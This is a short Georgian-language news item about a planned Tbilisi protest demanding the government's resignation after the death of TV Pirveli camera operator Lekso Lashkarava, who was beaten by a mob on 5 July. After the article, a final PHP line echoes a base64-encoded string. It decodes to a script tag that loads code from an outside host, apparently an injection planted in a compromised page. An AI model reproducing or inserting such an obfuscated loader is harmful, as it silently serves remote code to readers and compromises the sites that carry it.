celsiusi
ავერსი საქკაბელი
თბილისში, პარლამენტის შენობასთან მოქალაქეები აქციას გეგმავენ მთავრობის გადადგომის მოთხოვნით. აქცია მას შემდეგ დაიგეგმა, რაც ცნობილი გახდა ტვ პირველის ოპერატორის, ლექსო ლაშქარავას გარდაცვალების შესახებ. ლექსო 5 ივლისს, სიძულვილის ჯგუფების თავდასხმის მსხვერპლი გახდა "სირცხვილიას" ოფისთან, სადაც სამსახურებრივ მოვალეობას ასრულებდა. არსებული ინფორმაციით ის დღეს დილას, საკუთარ სახლში დედამ ნახა გარდაცვლილი. ამ დროისთვის ცხედარს ექსპერტიზა უტარდება.
 
აქციის ორგანიზატორებს სამი მოთხოვნა აქვთ:
 
ირაკლი ღარიბაშვილის მთავრობის დაუყოვნებლივ გადადგომა;
გარდაცვალების ფაქტის გამოძიება დამოუკიდებელი ექსპერტების ჩართვით;
ყველა იმ მოძალადის დაკავება და კანონის სრული სიმკაცრით დასჯა, რომლებიც ლექსოს დაესხნენ თავს!
 
ამ დროისთვის, ლექსო ლაშქარავაზე თავდამსხმელი მხოლოდ ორი პირია დაკავებული. მათ აღკვეთის ღონისძიების სახით პატიმრობა აქვთ შეფარდებული. მირანდა ბაღათურია, ჟურნალისტი, რომელიც თან ახლდა ლექსოს ძალადობრივი თავდასხმის დროს, ჰყვება, რომ მათი თავდამსხმელების რაოდენობა 20 მაინც იყო. თავდასხმის შემდეგ ლექსო ლაშქარავას დაზიანებული ჰქონდა სახის ძვლები და გაუკეთდა ქირურგიული ოპერაცია.
 
876
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");